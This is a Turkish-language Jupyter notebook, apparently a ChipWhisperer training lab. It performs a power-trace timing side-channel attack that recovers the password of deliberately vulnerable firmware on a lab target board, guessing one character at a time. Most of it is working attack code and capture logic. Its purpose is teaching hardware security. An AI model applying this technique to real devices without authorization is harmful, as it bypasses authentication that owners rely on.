Bir cihazın belirli işlemleri ne zaman gerçekleştireceğini belirlemek/bilmek cihazın güvenliğini aşmamıza yardımcı olabilmektedir. Bu örnekte, zamanlama saldırıları gerçekleştirmek için güç izi ile yan kanal analizinin nasıl kullanıldığı gösterilecektir. Basit parola tabanlı güvenlik sistemine sahip bir hedef kartın güvenliğini kırmaya çalışacağız. Bunun için basit bir parola kontrolü sağlayan firmware kullanacak ve temel bir güç analizinin nasıl yapıldığını göstereceğiz.

In [ ]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEXMEGA'
CRYPTO_TARGET = 'NONE'

API içerisinde bulunan hazır programı kullanacağız. -> basic-passwdcheck

In [ ]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET"
cd ../hardware/victims/firmware/basic-passwdcheck
make PLATFORM=$1 CRYPTO_TARGET=$2

In [ ]:
%run "Helper_Scripts/Setup_Generic.ipynb"

In [ ]:
fw_path = '../hardware/victims/firmware/basic-passwdcheck/basic-passwdcheck-{}.hex'.format(PLATFORM)

In [ ]:
cw.program_target(scope, prog, fw_path)

Hedef karta yüklediğimiz ürün yazılımı temel bir parola kontrolü uygular. Bir '\ n' ile sonlandırılmış parola aldıktan sonra, hedef kart onu kontrol eder ve sonsuz bir döngüye girer, bu yüzden onunla iletişim kurmadan önce sıfırlamamız gerekir. 

Sıfırlama işlemini çok yapacağımız için hedef kartı sıfırlayan bir fonksiyon tanımlıyoruz:

In [ ]:
import time
def reset_target(scope):
    if PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
        scope.io.pdic = 'low'
        time.sleep(0.05)
        scope.io.pdic = 'high'
        time.sleep(0.05)
    else:
        scope.io.nrst = 'low'
        time.sleep(0.05)
        scope.io.nrst = 'high'
        time.sleep(0.05)

Hedef kart, işlem başladığı zaman bize bir miktar metin gönderir. Aşağıdaki bloğu çalıştırdıktan sonra bir metin görmeliyiz.

Not: Metin, veri kaybıyla ilgili bir mesajla birlikte kesikli olarak görünebilir. Bu, seri veriyi (128 bayt) hedef kartta saklamak için kullanılan buffer'ın dolu olduğu anlamına gelir. Bu mesaj bu işlemde bizim için sorun oluşturmaz sadece bilgilendirmedir.

In [ ]:
ret = ""
reset_target(scope)

num_char = target.in_waiting()
while num_char > 0:
    ret += target.read(timeout=10)
    time.sleep(0.05)
    num_char = target.in_waiting()

print(ret)

Şimdi hedef karta bir parola gönderelim.

In [ ]:
target.flush() #Removes all data from the serial buffer.
target.write("h0px3\n")

Hedef kartın yanıtını inceleyelim. Eğer parolamız doğru ise “Access granted, Welcome!” mesajı görülecektir.

In [ ]:
print(target.read(timeout=100))

<b>Kayıt İzleri</b>

Artık güvenli sistemimizle iletişim kurabildiğimize göre, bir sonraki hedefimiz hedef kart çalışırken güç izini sürmektir. Bunu yapmak için, parola denemesi göndermeden hemen önce scope'u kuracağız, ardından izi daha önce yaptığımız gibi kaydedeceğiz.

In [ ]:
if PLATFORM == "CWNANO":
    scope.adc.samples = 800
else:
    scope.adc.samples = 1000

In [ ]:
ret = ""
reset_target(scope)
num_char = target.in_waiting()
while num_char > 0:
    ret += target.read(timeout=10)
    time.sleep(0.01)
    num_char = target.in_waiting()

print(ret)
scope.arm()
target.flush()
target.write("h0px3\n")
ret = scope.capture()
if ret:
    print('Timeout happened during acquisition')

trace = scope.get_last_trace()
resp = ""
num_char = target.in_waiting()
while num_char > 0:
    resp += target.read(timeout=10)
    time.sleep(0.01)
    num_char = target.in_waiting()
print(resp)

Şimdi sisteme ait bir güç izimiz var, bokeh kullanarak çizdirelim:

In [ ]:
from bokeh.plotting import figure, show
from bokeh.io import output_notebook
from bokeh.models import CrosshairTool

output_notebook()
p = figure()
x_range = range(0, len(trace))
p.line(x_range, trace)
show(p)

<b>Zamanlama Analizi</b>

Artık güç izini yakalayabildiğimiz için, saldırımızı planlayabiliriz. İlk önce, bir şifre tahmin edip bir güç izi döndürme fonksiyonu yapacağız, çünkü bu adımı parolayı kırmak için çok tekrarlayacağız:

In [ ]:
def cap_pass_trace(pass_guess):
    ret = ""
    reset_target(scope)
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()

    scope.arm()
    target.write(pass_guess)
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    trace = scope.get_last_trace()
    return trace

Şimdi iki farklı şifre deneyeceğiz ve güç izlerinin uzunluğa göre değişip değişmediğini göreceğiz. Daha sonra her iki izi de aynı şekilde çizdireceği ve farkı inceleyeceğiz.

In [ ]:
trace = cap_pass_trace("\n")
new_trace = cap_pass_trace("h\n")
newest_trace = cap_pass_trace("a\n")
newer_trace = cap_pass_trace("b\n")
x_range = range(0, len(new_trace))
p = figure()
p.add_tools(CrosshairTool())
p.line(x_range, new_trace)
p.line(x_range, trace, line_color='red')
p.line(x_range, newest_trace, line_color='yellow')
p.line(x_range, newer_trace, line_color='black')
show(p)

Her iki iz de benzer şekilde başlayıp bitmeliydi, ancak bazı yerlerde farklılık gösterdi. Mavi izin başlangıçta kırmızı iz gibi göründüğünü ancak zaman içinde değiştiğini görüyoruz. Bu zamanlama farkını şifreyi kırmak için kullanacağız.

Farklı uzunluklarda ve doğru karakter sayısında güç izinin nasıl değiştiğini görmek için de yukarıdaki kodu farklı şifreleri deneyerek düzenleyebiliriz.

<b>Tek Harfe Saldırma</b>

Şimdi, ayırt edici bir zamanlama farkı tespit ettikten sonra, saldırımızı oluşturmaya başlayabiliriz. Tek bir harfle başlayacağız, çünkü bu bize saldırı hakkında biraz geri bildirimde bulunacaktır.

Saldırı planı basit: orijinal konumdaki ayırt edici sivri uçları görene kadar harfleri tahmin etmeye devam edeceğiz. Bunu yapmak için şu döngüyü oluşturacağız:

-Bir sonraki tahmini belirtin

-İzi yakala ve kaydet

-İzdeki 81 noktasının -0,15'den büyük olup olmadığını kontrol et

81 indisli izi grafiği inceleyerek seçtik. en uzun sivri uca bakarak mavi kırmızının anlık yükseldiği değeri bulduk. Kırmızının değerini koda yazdık ve mavi ile aralarındaki farkı artış miktarını göstermesi için fonksiyon içerisine parametre olarak koyduk. İzin değeri -0,15'den küçük olduğu için o değerden büyük olan izi doğru kabul ederek parola harfi tahmini yaptık.


In [ ]:
def checkpass(trace, i):
    return trace[82 + 36 * i] > -0.15
    

In [ ]:
trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
for c in trylist:
    next_pass = password + c + "\n"
    trace = cap_pass_trace(next_pass)
    if checkpass(trace, 0):
        print("Success: " + c)
        break


<b>Parolanın Tamamına Saldırmak</b>

Artık tek bir karakter tahmin edebildiğimize göre, parolanın tamamını elde etmek için işlerimiz kolaylaştı. Bunun için bir önceki işlemi başka bir döngüde tekrarlamamız, kontrol noktasını taşımamız ve tahminimizi yeni doğru harfle güncellememiz gerekir.

In [ ]:
trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
for i in range(5):
    for c in trylist:
        next_pass = password + c + "\n"
        trace = cap_pass_trace(next_pass)
        if checkpass(trace, i):
            password += c
            print("Success, pass now {}".format(password))
            break

In [ ]:
scope.dis()
target.dis()